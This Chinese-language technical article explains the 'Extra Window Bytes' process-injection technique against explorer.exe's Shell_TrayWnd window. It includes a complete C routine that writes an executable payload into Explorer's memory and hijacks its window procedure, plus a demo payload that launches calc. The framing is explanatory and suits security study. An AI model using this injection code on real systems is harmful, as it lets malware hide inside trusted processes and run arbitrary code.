Windows进程注入技术:额外窗口字节能做很多事情

介绍

Windows 进程注入技术之所以被众人所知，是因为2013年肆虐网络的Powerloader恶意软件当时使用的正是这种技术。在此之前，几乎没有人知道这种进程注入技术，因为从上世纪80年代到90年代初期，当时的Windows操作系统就已经引入了这种“功能”。额外窗口字节的索引0值可以用来跟一个窗口的类对象进行关联，指向类对象的指针是使用SetWindowLongPtr存储在索引0位置的，并通过GetWindowLongPtr来获取。

早在2009年的WASM论坛上，就曾有一位名叫“Indy(Clerk)”的用户提到过将“Shell_TrayWnd”类作为一种注入向量来使用。下图显示的就是“Shell_TrayWnd”类的相关信息，你可以看到窗口字节的索引0设置有相应的值：

WindowsSpy++在这里并不能显示完整的64位值，但是在下图中我们可以看到，它显示了GetWindowLongPtr API所返回的同一窗口的值（CTray对象的完整地址）：

CTray类

这个类中只有三个方法，而且没有额外的属性值。指向每一个方法的指针都只有只读属性，所以我们不能直接将指向WndProc的指针重写并让它指向我们的Payload。因此，我们需要手动构造一个对象，但是我认为另一种比较好的方法是将现有对象拷贝到本地内存之中，重写WndProc，然后把对象写到explorer内存中的一个新的位置。下面的结构体可以用来定义我们所需要的对象及指针：

//CTray object for Shell_TrayWnd
type defstruct _ctray_vtable {
 ULONG_PTR vTable; // change to remote memory address
 ULONG_PTR AddRef;
 ULONG_PTR Release;
 ULONG_PTR WndProc; // window procedure (change to payload)
}CTray;

上面这个结构体包含了替换CTray对象（包括32位和64位操作系统）所需要的所有数据，32位系统中ULONG_PTR的大小为4个字节，64位系统则是8个字节。

Payload

这种方法跟PROPagate所使用的代码之间主要的区别就在于函数原型，如果在函数将返回值传递给调用者时我们不提供相同数量的参数，那么将有可能让Windows Explorer崩溃，或者让那些跟这个类有关联的窗口发生崩溃。

LRESULTCALLBACK WndProc(HWND hWnd, UINT uMsg,
 WPARAM wParam, LPARAM lParam)
{
 // ignore messages other than WM_CLOSE
 if (uMsg != WM_CLOSE) return 0;
 
 WinExec_t pWinExec;
 DWORD szWinExec[2],
 szCalc[2];
 
 // WinExec
 szWinExec[0]=0x456E6957;
 szWinExec[1]=0x00636578;
 
 // calc
 szCalc[0] = 0x636C6163;
 szCalc[1] = 0;
 
 pWinExec =(WinExec_t)xGetProcAddress(szWinExec);
 if(pWinExec != NULL) {
 pWinExec((LPSTR)szCalc, SW_SHOW);
 }
 return 0;
}

完整的函数

下面给出的是执行注入所需要的完整函数代码（位置无关代码PIC），这里为了方便演示，我忽略了错误处理：

LPVOIDewm(LPVOID payload, DWORD payloadSize){
 LPVOID cs, ds;
 CTray ct;
 ULONG_PTR ctp;
 HWND hw;
 HANDLE hp;
 DWORD pid;
 SIZE_T wr;

1. 获取shell tray窗口的处理器

 hw = FindWindow("Shell_TrayWnd",NULL);

2. 获取explorer.exe的进程ID

 GetWindowThreadProcessId(hw, &pid);

3. 打开explorer.exe

 hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE,pid);

4. 获取指向当前CTray对象的指针

 ctp = GetWindowLongPtr(hw, 0);

5. 读取当前CTray对象的地址

 ReadProcessMemory(hp, (LPVOID)ctp, 
 (LPVOID)&ct.vTable,sizeof(ULONG_PTR), &wr);

6. 从虚拟页表中读取三条地址

ReadProcessMemory(hp, (LPVOID)ct.vTable, 
 (LPVOID)&ct.AddRef, sizeof(ULONG_PTR)* 3, &wr);

7.为代码分配内存读/写/执行权限

 cs = VirtualAllocEx(hp, NULL, payloadSize, 
 MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);

8. 将代码拷贝到目标进程中

 WriteProcessMemory(hp, cs, payload,payloadSize, &wr);

9. 为新的CTray对象分配内存读/写权限

 ds = VirtualAllocEx(hp, NULL, sizeof(ct), 
 MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);

10. 向远程内存写入新的CTray对象

ct.vTable = (ULONG_PTR)ds + sizeof(ULONG_PTR);
 ct.WndProc = (ULONG_PTR)cs;
 WriteProcessMemory(hp, ds, &ct,sizeof(ct), &wr);

11. 设置指向CTray对象的新指针

 SetWindowLongPtr(hw, 0, (ULONG_PTR)ds);

12. 通过窗口消息触发Payload

 PostMessage(hw, WM_CLOSE, 0, 0);

13. 恢复原始的CTray对象

 SetWindowLongPtr(hw, 0, ctp);

14. 释放内存，关闭处理进程

 VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT |MEM_RELEASE);
 VirtualFreeEx(hp, ds, 0, MEM_DECOMMIT |MEM_RELEASE);
 
 CloseHandle(hp);
}

总结

这种针对窗口对象的进程注入技术通常会被归类为“Shatter”攻击，虽然Windows Vista引入的用户接口权限隔离（UIPI）功能从某种程度上来说能够缓解这种攻击所带来的影响，但最新版本的Windows 10操作系统仍然无法抵御这种类型的攻击。

感兴趣的用户可以私信‘654’获取Payload源代码和可执行程序计算器。